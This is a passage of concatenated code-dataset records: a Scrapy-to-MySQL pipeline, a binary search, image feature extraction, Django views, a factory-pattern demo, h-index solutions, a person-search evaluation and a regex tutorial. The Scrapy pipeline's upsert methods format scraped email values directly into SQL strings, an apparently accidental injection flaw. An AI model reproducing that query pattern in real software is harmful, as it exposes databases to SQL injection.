get_string(value).strip() if EMAIL_REGEX.match(value) else ''\n elif key == \"website\":\n item[key] = get_string(value).strip() if URL_REGEX.match(value) else ''\n else:\n item[key] = get_string(value).strip().replace('_', ' ') if value and len(value) > 1 else ''\n return item\n\n\nclass MySQLPipeline(object):\n \"\"\"A pipeline to store the item in a MySQL database.\n This implementation uses Twisted's asynchronous database API.\n \"\"\"\n # insert_query = \"INSERT IGNORE INTO hcpreports (%s) values (%s)\"\n # update_query = \"UPDATE hcpreports 
SET %s WHERE email='%s'\"\n    insert_query = \"INSERT IGNORE INTO {} (%s) values (%s)\".format(settings.get('DB_TABLE'))\n    update_query = \"UPDATE {} SET %s WHERE email='%s'\".format(settings.get('DB_TABLE'))\n\n    def __init__(self):\n        dbargs = settings.get('DB_CONNECT')\n        db_server = settings.get('DB_SERVER')\n        dbpool = adbapi.ConnectionPool(db_server, **dbargs)\n        self.dbpool = dbpool\n\n    def __del__(self):\n        self.dbpool.close()\n\n    def process_item(self, item, spider):\n        # run db query in the thread pool\n        d = self.dbpool.runInteraction(self._do_upsert, item, spider)\n        d.addErrback(self._handle_error, item, spider)\n        # at the end return the item in case of success or failure\n        d.addBoth(lambda _: item)\n        # return the deferred instead of the item. This makes the engine\n        # process the next item (according to CONCURRENT_ITEMS setting) after this\n        # operation (deferred) has finished.\n        return d\n\n    def _do_upsert(self, conn, item, spider):\n        \"\"\"Perform an insert or update.\"\"\"\n        conn.execute(\"\"\"SELECT EXISTS(\n            SELECT 1 FROM {} WHERE email = '{}'\n        )\"\"\".format(settings.get('DB_TABLE'), item[\"email\"]))\n        ret = conn.fetchone()[0]\n\n        if ret:\n            self._update_data(item, self.update_query)\n            spider.log(\"Item updated in db: %s %r\" % (item[\"email\"], item))\n        else:\n            self._insert_data(item, self.insert_query)\n            spider.log(\"Item stored in db: %s %r\" % (item[\"email\"], item))\n        return item\n\n    def _insert_data(self, item, insert):\n        keys = item.fields.keys()\n        fields = u','.join(keys)\n        qm = u','.join([u'%s'] * len(keys))\n        sql = insert % (fields, qm)\n        data = [item[k] for k in keys]\n        return self.dbpool.runOperation(sql, data)\n\n    def _update_data(self, item, update):\n        keys = item.fields.keys()\n        fields = u','.join([\"{}=%s\".format(key) for key in keys if key != \"email\"])\n        sql = update % (fields, item[\"email\"])\n        data = [item[k] for k in keys if k != \"email\"]\n        return self.dbpool.runOperation(sql, data)\n\n    def _handle_error(self, failure, item, spider):\n        \"\"\"Handle an error that occurred during db interaction.\"\"\"\n        # do nothing, just log\n        log.err(failure)\n\n    def _get_guid(self, item):\n        \"\"\"Generates a unique identifier for a given item.\"\"\"\n        # hash based solely on the url field\n        return md5(item['url']).hexdigest()\n","sub_path":"hcpreports/sweep/sweep/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"210701408","text":"def binary_search(n, m, array, keys):\n    result = []\n    for key in keys:\n        result.append(search_key(array, int(key), 0, n-1))\n    return result\n\ndef search_key(array, key, start, end):\n    if key == array[(end-start)//2+start]:\n        return (end-start)//2 + start + 1\n    if start == end:\n        return -1\n    elif key > array[(end-start)//2+start]:\n        start = (end-start)//2 + start + 1\n        return search_key(array, key, start, end)\n    elif key < array[(end-start)//2+start]:\n        end = (end-start)//2 + start\n        return search_key(array, key, start, end)\n\nif __name__ == '__main__':\n    with open('rosalind_bins.txt') as f:\n        data_list = f.read().splitlines()\n    n = int(data_list[0])\n    m = int(data_list[1])\n    array = [int(i) for i in data_list[2].split()]\n    keys = [int(i) for i in data_list[3].split()]\n    result = [str(i) for i in binary_search(n, m, array, keys)]\n    with open('rosalind_bins_result.txt', 'w') as f:\n        f.write(' 
'.join(result))\n","sub_path":"algorithmic_heights/BINS/BINS.py","file_name":"BINS.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"109864267","text":"import os\nimport h5py\nimport numpy as np\nimport argparse\nimport json\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.models import Model, load_model \nfrom tensorflow.keras.applications.resnet_v2 import preprocess_input\n\nlabel_list = ['Abyssinian','Bengal','Birman','Bombay','British_Shorthair','Egyptian_Mau','Maine_Coon','Persian','Ragdoll','Russian_Blue','Siamese','Sphynx','american_bulldog','american_pit_bull_terrier','basset_hound','beagle','boxer','chihuahua','english_cocker_spaniel','english_setter','german_shorthaired','great_pyrenees','havanese','japanese_chin','keeshond','leonberger','miniature_pinscher','newfoundland','pomeranian','pug','saint_bernard','samoyed','scottish_terrier','shiba_inu','staffordshire_bull_terrier','wheaten_terrier','yorkshire_terrier']\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-database\", required = True,\n help = \"Path to database which contains images to be indexed\")\nap.add_argument(\"-embedding\", required = True,\n help = \"Name of output embedding\")\nap.add_argument(\"-json\", required = True,\n help = \"Name of json\")\nargs = vars(ap.parse_args())\n\nimport re\n\ndef get_first_digit_pos(s):\n first_digit = re.search('\\d', s)\n return first_digit.start()\n\ndef get_imlist(path):\n return [os.path.join(path,f) for f in os.listdir(path) if f.endswith('.jpg')]\n\nfrom numpy import linalg\ndef extract_from_img(img_path):\n img = image.load_img(img_path, target_size=(224, 224))\n img = image.img_to_array(img)\n img = np.expand_dims(img, axis=0)\n img = preprocess_input(img)\n feat = extract_model.predict(img)\n norm_feat = feat[0] / linalg.norm(feat[0])\n return norm_feat\n\nif __name__ == \"__main__\":\n\n db = args[\"database\"]\n embedding_file = args[\"embedding\"]\n json_file = args[\"json\"]\n img_list = get_imlist(db)\n \n print(\"--------------------------------------------------\")\n print(\" feature extraction starts\")\n print(\"--------------------------------------------------\")\n \n feats = []\n names = []\n labels = []\n\n model = load_model('/home/cyhong021/saved_model/resnet50/model_epoch100_loss0.05_acc1.00.h5')\n \n layer_name = 'dense'\n extract_model = Model(inputs=model.input,\n outputs=model.get_layer(layer_name).output)\n\n for i, img_path in enumerate(img_list):\n norm_feat = extract_from_img(img_path)\n img_name = os.path.split(img_path)[1]\n feats.append(norm_feat)\n names.append(img_name)\n #print(names)\n #print(label_list.index(img_name[:get_first_digit_pos(img_name) - 1]))\n labels.append(label_list.index(img_name[:get_first_digit_pos(img_name) - 1]))\n if i%300 == 0:\n print(\"extracting feature from image No. 
%d , %d images in total\" %((i+1), len(img_list)))\n\n\n with open(json_file, 'w') as outfile:\n json.dump({'name': names, 'label':labels}, outfile)\n feats = np.array(feats)\n print(feats.shape)\n np.savez(embedding_file, ans=feats)\n \n print(\"--------------------------------------------------\")\n print(\" writing feature extraction results ...\")\n print(\"--------------------------------------------------\")\n\n","sub_path":"deeplearning/network_traninig_withlabel/extract_feature_resnet50.py","file_name":"extract_feature_resnet50.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116814134","text":"import seamless\nimport time\nfrom seamless import cell, context, transformer, macro\nfrom seamless.lib.gui.basic_editor import edit\nfrom seamless.lib.gui.basic_display import display\n\n@macro(\"str\")\ndef construct_silk_model(ctx, mode):\n from seamless import transformer\n params = {\"value\": {\"pin\": \"output\", \"dtype\": \"text\"}}\n if mode == \"array\":\n params[\"N\"] = {\"pin\": \"input\", \"dtype\": \"int\"}\n code = \"\"\"s = SilkModel()\nreturn str(SilkModelArray([s for n in range(N)]))\n\"\"\"\n else:\n code = \"return str(SilkModel())\"\n ctx.transf = transformer(params)\n ctx.transf.code.cell().set(code)\n ctx.registrar.silk.connect(\"SilkModel\", ctx.transf)\n if mode == \"array\":\n ctx.registrar.silk.connect(\"SilkModelArray\", ctx.transf)\n ctx.export(ctx.transf)\n\nctx = context()\nsilk_model = \"\"\"\nType SilkModel {\n Integer a = 1\n Float b = 2.0\n Bool c = True\n String x = \"OK\"\n}\n\"\"\"\nsilk_model2 = \"\"\"\nType SilkModel {\n Integer a = 1\n Float b = 2.0\n Bool c = True\n String x = \"OK2\"\n}\n\"\"\"\n\nctx.silk_model = cell((\"text\", \"code\", \"silk\"))\nctx.silk_model.set(silk_model)\nctx.registrar.silk.register(ctx.silk_model)\n\nctx.n = cell(\"int\").set(3)\nctx.mode = cell(\"str\").set(\"standard\")\nctx.value = cell(\"text\")\nctx.cons = construct_silk_model(ctx.mode)\nctx.cons.value.connect(ctx.value)\nctx._validate_path()\n\nctx.silk_model.set(silk_model2)\n#time.sleep(0.001)\nctx.equilibrate()\nprint(ctx.value.data)\n\nctx.ed_silk_model = edit(ctx.silk_model,\"Silk model\")\nctx._validate_path()\n\nctx.d_value = display(ctx.value,\"Result\")\nctx._validate_path()\n\nctx.mode.set(\"array\")\nctx.n.connect(ctx.cons.N)\n\nimport os\nctx.tofile(os.path.splitext(__file__)[0] + \".seamless\", backup=False)\n","sub_path":"OLD/tests/test-macro.py","file_name":"test-macro.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"554380112","text":"# -*- coding: utf-8 -*-\n# Copyright 2022 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\n\nimport proto # type: ignore\n\n\n__protobuf__ = proto.module(\n package=\"google.ads.googleads.v13.enums\",\n marshal=\"google.ads.googleads.v13\",\n 
manifest={\"ClickTypeEnum\",},\n)\n\n\nclass ClickTypeEnum(proto.Message):\n r\"\"\"Container for enumeration of Google Ads click types.\n \"\"\"\n\n class ClickType(proto.Enum):\n r\"\"\"Enumerates Google Ads click types.\"\"\"\n UNSPECIFIED = 0\n UNKNOWN = 1\n APP_DEEPLINK = 2\n BREADCRUMBS = 3\n BROADBAND_PLAN = 4\n CALL_TRACKING = 5\n CALLS = 6\n CLICK_ON_ENGAGEMENT_AD = 7\n GET_DIRECTIONS = 8\n LOCATION_EXPANSION = 9\n LOCATION_FORMAT_CALL = 10\n LOCATION_FORMAT_DIRECTIONS = 11\n LOCATION_FORMAT_IMAGE = 12\n LOCATION_FORMAT_LANDING_PAGE = 13\n LOCATION_FORMAT_MAP = 14\n LOCATION_FORMAT_STORE_INFO = 15\n LOCATION_FORMAT_TEXT = 16\n MOBILE_CALL_TRACKING = 17\n OFFER_PRINTS = 18\n OTHER = 19\n PRODUCT_EXTENSION_CLICKS = 20\n PRODUCT_LISTING_AD_CLICKS = 21\n SITELINKS = 22\n STORE_LOCATOR = 23\n URL_CLICKS = 25\n VIDEO_APP_STORE_CLICKS = 26\n VIDEO_CALL_TO_ACTION_CLICKS = 27\n VIDEO_CARD_ACTION_HEADLINE_CLICKS = 28\n VIDEO_END_CAP_CLICKS = 29\n VIDEO_WEBSITE_CLICKS = 30\n VISUAL_SITELINKS = 31\n WIRELESS_PLAN = 32\n PRODUCT_LISTING_AD_LOCAL = 33\n PRODUCT_LISTING_AD_MULTICHANNEL_LOCAL = 34\n PRODUCT_LISTING_AD_MULTICHANNEL_ONLINE = 35\n PRODUCT_LISTING_ADS_COUPON = 36\n PRODUCT_LISTING_AD_TRANSACTABLE = 37\n PRODUCT_AD_APP_DEEPLINK = 38\n SHOWCASE_AD_CATEGORY_LINK = 39\n SHOWCASE_AD_LOCAL_STOREFRONT_LINK = 40\n SHOWCASE_AD_ONLINE_PRODUCT_LINK = 42\n SHOWCASE_AD_LOCAL_PRODUCT_LINK = 43\n PROMOTION_EXTENSION = 44\n SWIPEABLE_GALLERY_AD_HEADLINE = 45\n SWIPEABLE_GALLERY_AD_SWIPES = 46\n SWIPEABLE_GALLERY_AD_SEE_MORE = 47\n SWIPEABLE_GALLERY_AD_SITELINK_ONE = 48\n SWIPEABLE_GALLERY_AD_SITELINK_TWO = 49\n SWIPEABLE_GALLERY_AD_SITELINK_THREE = 50\n SWIPEABLE_GALLERY_AD_SITELINK_FOUR = 51\n SWIPEABLE_GALLERY_AD_SITELINK_FIVE = 52\n HOTEL_PRICE = 53\n PRICE_EXTENSION = 54\n HOTEL_BOOK_ON_GOOGLE_ROOM_SELECTION = 55\n SHOPPING_COMPARISON_LISTING = 56\n CROSS_NETWORK = 57\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"google/ads/googleads/v13/enums/types/click_type.py","file_name":"click_type.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"549246899","text":"from django.views.generic import TemplateView\nfrom money.models import Credit\nfrom money.forms import CreditForm\nfrom django.views import View\nfrom django.shortcuts import redirect\n\n\nclass Home(TemplateView):\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n context = super(Home, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated:\n context['credits'] = Credit.objects.filter(user=self.request.user)\n context['form'] = CreditForm()\n else:\n self.template_name = 'login.html'\n context['credits'] = []\n return context\n\n\nclass CreditCreateView(View):\n def post(self, request):\n form = CreditForm(request.POST)\n if form.is_valid():\n form.save()\n print(form.errors)\n return redirect('home')\n\n\nclass DetailsView(TemplateView):\n template_name = 'details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailsView, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated:\n context['total'] = {\n 'minus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(sign=False).values_list('total', flat=True)\n ),\n 'plus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(sign=True).values_list('total', flat=True)\n ),\n }\n context['total']['summary'] = context['total']['plus'] - context['total']['minus']\n\n 
context['cash'] = {\n 'minus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(type=0).filter(sign=False).values_list(\n 'total', flat=True\n )\n ),\n 'plus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(type=0).filter(sign=True).values_list(\n 'total', flat=True\n )\n ),\n }\n context['cash']['summary'] = context['cash']['plus'] - context['cash']['minus']\n\n context['card'] = {\n 'minus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(type=1).filter(sign=False).values_list(\n 'total', flat=True\n )\n ),\n 'plus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(type=1).filter(sign=True).values_list(\n 'total', flat=True\n )\n ),\n }\n context['card']['summary'] = context['card']['plus'] - context['card']['minus']\n else:\n context['credits'] = []\n return context\n","sub_path":"money/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88132305","text":"import abc\nimport json\nimport xml.etree.ElementTree as et\n\nclass Song:\n def __init__(self, song_id, title, artist):\n self.song_id = song_id\n self.title = title\n self.artist = artist\n\n# Product\nclass Serializer(abc.ABC):\n @abc.abstractmethod\n def serialize(self,song):\n pass\n\n# Concrete Product\nclass JsonSerializer(Serializer):\n def serialize(self,song):\n song_info = {\n 'id': song.song_id,\n 'title': song.title,\n 'artist': song.artist\n }\n return json.dumps(song_info)\n\n# Concrete Product\nclass XmlSerializer(Serializer):\n def serialize(self,song):\n song_info = et.Element('song', attrib={'id': song.song_id})\n title = et.SubElement(song_info, 'title')\n title.text = song.title\n artist = et.SubElement(song_info, 'artist')\n artist.text = song.artist\n return et.tostring(song_info, encoding='unicode')\n\n\n\n# Concrete Creator\nclass SerializeFactory:\n def _get_serializer(self, format):\n if format == 'json':\n return JsonSerializer()\n elif format == 'xml':\n return XmlSerializer()\n else:\n raise ValueError(format)\n\n\nsong = Song('1', 'Song name', 'Song Artist')\n\nfactory = SerializeFactory()\njson_serializer = factory._get_serializer('json')\nxml_serializer = factory._get_serializer('xml')\n\nprint(json_serializer.serialize(song))\nprint(xml_serializer.serialize(song))","sub_path":"FactoryPattern/solution/solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"98732131","text":"# Linear Solution\nclass Solution:\n def hIndex(self, citations: List[int]) -> int:\n if citations == None or len(citations) == 0:\n return 0\n n = len(citations)\n for i in range(n):\n diff = n - i\n if citations[i] >= diff:\n return diff\n return 0\n\n# Time Complexity: O(n)\n# Space Complexity: O(1)\n\n# Binary Search Solution\nclass Solution:\n def hIndex(self, citations: List[int]) -> int:\n if citations == None or len(citations) == 0:\n return 0\n n = len(citations)\n low = 0\n high = n - 1\n while low <= high:\n mid = low + (high - low) // 2\n if citations[mid] == n - mid:\n return n - mid\n elif citations[mid] < n - mid:\n low = mid + 1\n else:\n high = mid - 1\n return n - low\n# Time Complexity: O(log(n))\n# Space Complexity: 
O(1)\n\n\n","sub_path":"Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"328853227","text":"from PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nimport os, sys\n\n\n# size = 192, 192\n# size = 96, 96\n# size = 128, 128\n# size = 64, 64\nsize = 192, 192\nsize = 96, 96\nsize = 128, 128\nsize = 64, 64\n\nexts = [\".jpg\", \".png\", \".gif\", \"jpeg\"]\n\nclip = {}\n\nopened = open('fileboat.nogit.txt')\nscan_path, files = eval(opened.read())\nprint(len(files), \"total files\")\nopened.close()\n\n\nprint(len(files))\n\nfiles = [a for a in files if a[0][-4:].lower() in exts]\n\nprint(len(files))\n\n\n# height = size[1]*len(files)\nheight = size[1]*1000\n\ncalc_size = (size[0], height)\nprint(calc_size)\n\nfrom math import sqrt\n\nmosaic_size = int(sqrt(len(files)))*size[0]\nmosaic = Image.new('RGB', calc_size)\n\n\n# exit()\n\nfor i,tup in enumerate(files):\n    try:\n        basename, filename, filesize, abspath = tup\n        if filename[-4:] not in exts:\n            print(\"skipping\", filename)\n            continue\n        im = Image.open(filename)\n        im.thumbnail(size)\n        ext = ''\n\n        if filename[-4:] == \".png\" or filename[-4:] == \".gif\":\n            ext = \"PNG\"\n        else:\n            ext = \"JPEG\"\n        # special case for gif folder with those .jpg named gif (wtf again!?)\n        if len(sys.argv)>1: ext = \"PNG\"\n        new_size = im.size\n        \n        clip[filename] = [i,list(new_size)]\n        mosaic.paste(im,(0,i*size[1]))\n\n        print(40*' ', '\r', filename, 'done')\n        if i >1000: break\n    except Exception as exc:\n        print(filename, filename[-4:], exc)\n\nif os.path.isfile('mosaic.jpg'):\n    os.remove('mosaic.jpg')\nmosaic.save('mosaic.jpg')\nopen('mosaic.txt','w').write(repr(clip))","sub_path":"_projects/fileboat/mosaic-maker-vertical.py","file_name":"mosaic-maker-vertical.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"654149106","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import learning_curve\r\n\r\n\r\nclass Helper(object):\r\n\r\n    @staticmethod\r\n    def augment(X):\r\n        if X.ndim == 1:\r\n            return np.concatenate((X, [1]))\r\n        else:\r\n            pad = np.ones((1, X.shape[1]))\r\n            return np.concatenate((X, pad), axis=0)\r\n\r\n    @staticmethod\r\n    def onehot_decode(X):\r\n        return np.argmax(X, axis=0)\r\n\r\n    @staticmethod\r\n    def onehot_encode(L, c):\r\n        if isinstance(L, int):\r\n            L = [L]\r\n        n = len(L)\r\n        out = np.zeros((c, n))\r\n        out[L, range(n)] = 1\r\n        return np.squeeze(out)\r\n\r\n    @staticmethod\r\n    def plot_output(X, Y):\r\n        plt.scatter(X, Y)\r\n        plt.show()\r\n\r\n    @staticmethod\r\n    def plot_validation_curve(alphas, train_error, validation_error):\r\n        plt.subplot(2, 1, 1)\r\n        plt.semilogx(alphas, train_error[0], label='Train')\r\n        plt.semilogx(alphas, validation_error[0], label='Test')\r\n        # i_alpha_optim = np.argmax(validation_error)\r\n        # alpha_optim = alphas[i_alpha_optim]\r\n        # plt.vlines(alpha_optim, plt.ylim()[0], np.max(validation_error), color='k',\r\n        #            linewidth=3, label='Optimum on test')\r\n        plt.legend(loc='lower left')\r\n        plt.ylim([0, 1.2])\r\n        plt.xlabel('Regularization parameter')\r\n        plt.ylabel('Score')\r\n        plt.show()\r\n\r\n    @staticmethod\r\n    def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None, n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):\r\n        plt.figure()\r\n        plt.title(title)\r\n        if ylim is not None:\r\n            plt.ylim(*ylim)\r\n        plt.xlabel(\"Training examples\")\r\n        
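        # Descriptive note (added, not in the original): sklearn's learning_curve
        # returns the training-set sizes actually used together with per-fold
        # train/test scores of shape (n_sizes, n_folds); the shaded bands drawn
        # below are the mean +/- one standard deviation across the cv folds.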
plt.ylabel(\"Score\")\r\n train_sizes, train_scores, test_scores = learning_curve(\r\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\r\n train_scores_mean = np.mean(train_scores, axis=1)\r\n train_scores_std = np.std(train_scores, axis=1)\r\n test_scores_mean = np.mean(test_scores, axis=1)\r\n test_scores_std = np.std(test_scores, axis=1)\r\n plt.grid()\r\n\r\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\r\n train_scores_mean + train_scores_std, alpha=0.1,\r\n color=\"r\")\r\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\r\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\r\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\r\n label=\"Training score\")\r\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\r\n label=\"Cross-validation score\")\r\n\r\n plt.legend(loc=\"best\")\r\n plt.show()","sub_path":"utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"491218985","text":"\nfrom django.contrib import admin \nfrom django.urls import path \nfrom django.conf import settings \nfrom django.conf.urls.static import static \nfrom . import views\nfrom .views import *\n\nurlpatterns = [\n path('',views.home,name='home'),\n\tpath('login/',views.loginPage,name='login'),\n\tpath('logout/',views.logoutUser,name='logout'),\n\tpath('register/',views.register,name='register'),\n\tpath('profile//',views.profile,name='profile'),\n\tpath('gallery/',views.gallery,name='gallery'),\n\tpath('gallery_search/',views.gallery,name='gallery_search'),\n\tpath('canvas/',views.canvas,name='canvas'),\n\tpath('tutorial/',views.tutorial,name='tutorial'),\n\tpath('index/',views.index,name='index'),\n\tpath('edit_profile/',views.edit_profile,name='edit_profile'),\n\tpath('like/', views.like, name='like'),\n\tpath('favorite/', views.favorite, name='favorite'),\n\tpath('comicpage///',views.comicpage,name='comicpage'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)","sub_path":"Skribbly/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"276838335","text":"from maskrcnn_benchmark.structures.boxlist_ops import boxlist_iou\nimport torch\nimport numpy as np\nfrom sklearn.metrics import average_precision_score\nfrom collections import defaultdict\nfrom tqdm import tqdm\n\ndef eval_part(dataset, predictions, qdataset, query_predictions, output_folder, logger, query_pad_by_gt=None):\n # predictions\n # results_dict.update({img_id: result for img_id, result in zip(image_ids, output)}\n\n\n det_thresh = 0.5\n\n name_to_det_feat = {}\n\n FEAT_DIM = predictions[0].get_field(\"embeds\").size(1)\n n_parts = predictions[0].get_field(\"part_embeds\").size(1) // FEAT_DIM - 1\n\n logger.info(\n \"Dimension of Global Feature: \" + str(FEAT_DIM)\n )\n logger.info(\n \"Number of Local Features: \" + str(n_parts)\n )\n\n print('Processing name_to_det_feat...')\n for image_id, prediction in enumerate(predictions):\n name = dataset.frame[image_id]\n gt_bboxlist = dataset.get_groundtruth(image_id)\n\n img_info = dataset.get_img_info(image_id)\n width = img_info['width']\n height = img_info['height']\n\n prediction = prediction.resize((width, height))\n det = np.array(prediction.bbox)\n det_feat_g = prediction.get_field(\"embeds\")\n det_feat_part 
= prediction.get_field(\"part_embeds\")\n\n det_feat = torch.cat([det_feat_g, (1./n_parts)*det_feat_part], dim=1)\n det_feat = np.array(det_feat)\n\n pids = np.array(gt_bboxlist.get_field(\"ids\"))\n\n # CHECK\n #print(prediction.get_field(\"scores\").shape)\n scores = np.array(prediction.get_field(\"scores\"))\n inds = np.where(scores>=det_thresh)[0]\n\n if len(inds) > 0:\n name_to_det_feat[name] = (det[inds, :], det_feat[inds, :], pids)\n\n\n q_feat = []\n q_id = []\n q_imgname = []\n print('FOWARD QUERY...')\n for image_id, qpred in enumerate(query_predictions):\n\n gt_bboxlist = qdataset.get_groundtruth(image_id)\n\n qids = qpred.get_field(\"ids\")\n qfeat_g = qpred.get_field(\"embeds\")\n qfeat_part = qpred.get_field(\"part_embeds\")\n qfeat = torch.cat([qfeat_g, (1./n_parts)*qfeat_part], dim=1)\n qimgname = qpred.get_field(\"imgname\")\n \n q_feat.append(qfeat)\n q_id.extend(list(qids))\n q_imgname.extend(list(qimgname))\n\n q_feat = np.concatenate(q_feat, axis=0)\n q_id = np.array(q_id)\n q_imgname = np.array(q_imgname)\n\n\n aps = []\n accs = []\n topk = [1, 5, 10]\n\n for i in tqdm(range(q_feat.shape[0])):\n\n y_true, y_score = [], []\n imgs, rois = [], []\n count_gt, count_tp = 0, 0\n\n feat_p = q_feat[i, :]\n probe_imgname = qdataset.frame[q_imgname[i]]\n\n \n probe_pid = q_id[i]\n\n probe_gts = {}\n\n for image_id in range(len(dataset)):\n gt_bboxlist = dataset.get_groundtruth(image_id)\n name = dataset.frame[image_id]\n\n gt_ids = gt_bboxlist.get_field(\"ids\")\n if probe_pid in gt_ids and name != probe_imgname:\n loc = np.where(gt_ids==probe_pid)[0]\n probe_gts[name] = np.array(gt_bboxlist.bbox)[loc]\n\n\n for image_id in range(len(dataset)):\n gallery_imgname = dataset.frame[image_id]\n if gallery_imgname == probe_imgname:\n continue\n count_gt += (gallery_imgname in probe_gts)\n\n if gallery_imgname not in name_to_det_feat:\n continue\n\n det, feat_g, pids_g = name_to_det_feat[gallery_imgname]\n sim = np.dot(feat_g, feat_p).ravel()\n label = np.zeros(len(sim), dtype=np.int32)\n\n if gallery_imgname in probe_gts:\n gt = probe_gts[gallery_imgname].ravel()\n w, h = gt[2] - gt[0], gt[3] - gt[1]\n\n iou_thresh = min(0.5, (w*h*1.0)/((w+10)*(h+10)))\n inds = np.argsort(sim)[::-1]\n sim = sim[inds]\n det = det[inds]\n\n for j, roi in enumerate(det[:, :]):\n if compute_iou(roi, gt) >= iou_thresh:\n label[j] = 1\n count_tp += 1\n break\n\n y_true.extend(list(label))\n y_score.extend(list(sim))\n\n\n y_score = np.asarray(y_score)\n y_true = np.asarray(y_true)\n recall_rate = count_tp*1.0/count_gt\n ap = 0 if count_tp == 0 else average_precision_score(y_true, y_score)*recall_rate\n aps.append(ap)\n\n inds = np.argsort(y_score)[::-1]\n y_score = y_score[inds]\n y_true = y_true[inds]\n accs.append([min(1, sum(y_true[:k])) for k in topk])\n\n mAP = np.mean(aps)\n accs_ = np.mean(accs, axis=0)\n \n log_result = 'Result: \\nmAP: {:.2%}\\n'.format(mAP)\n for i, k in enumerate(topk):\n log_result += ('top-{:2d} = {:.2%}\\n'.format(k, accs_[i]))\n # print('top-{:2d} = {:.2%}'.format(k, accs_[i]))\n logger.info(log_result)\n\n return\n\ndef compute_iou(box1, box2):\n # (4, )\n # (xmin, ymin, xmax, ymax)\n w = min(box1[2], box2[2]) - max(box1[0], box2[0])\n h = min(box1[3], box2[3]) - max(box1[1], box2[1])\n if w <= 0 or h <= 0:\n return 0\n area1 = (box1[2]-box1[0])*(box1[3]-box1[1])\n area2 = (box2[2]-box2[0])*(box2[3]-box2[1])\n cross = w*h\n return 
cross/(area1+area2-cross)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"maskrcnn_benchmark/data/datasets/eval_part.py","file_name":"eval_part.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"456396539","text":"import re\n\n\ndef nocoes_basicas():\n print(\"\\nNoções Básicas\")\n string = 'Testando expressões regulares em Python'\n print(re.findall(r'regulares', string)) # Função que retorna todas as ocorrências de 'teste' dentro da string\n print(re.sub(r'regulares', 'ABC', string)) # Função que substitui 'regulares' por 'ABC' dentro da string\n print(re.search(r'regulares', string)) # Função que retorna instancia de Match se\n # capturar alguma palavra válida, ou None se não achar\n\n regex = re.compile(r'teste') # O Python precisa sempre compilar uma nova expressão regular,\n # mas ao usar compile, ele compila ela e depois não precisa compilar de novo\n\n\ndef meta_caracteres():\n # \\ - Usada para escapar caracteres reservados\n # | - Ou\n # . - Qualquer caractere (com exceção de quebra de linha)\n # [] - Dentro dos colchetes são colocados caracteres, é aceito pela regex qualquer caractere dentro dos colchetes\n # ^ - Indica o início da string\n # $ - Indica o fim da string\n frase = 'Python python'\n\n print(\"\\nMeta Caracteres\")\n print(re.findall(r'Python|python', frase)) # Aceita 'Python' ou 'python'\n print(re.findall(r'..thon', frase)) # Aceita qualquer palavra com 'thon' sucedido de dois caracteres qualquer\n print(re.findall(r'[Pp]ython', frase)) # Aceita palavras que 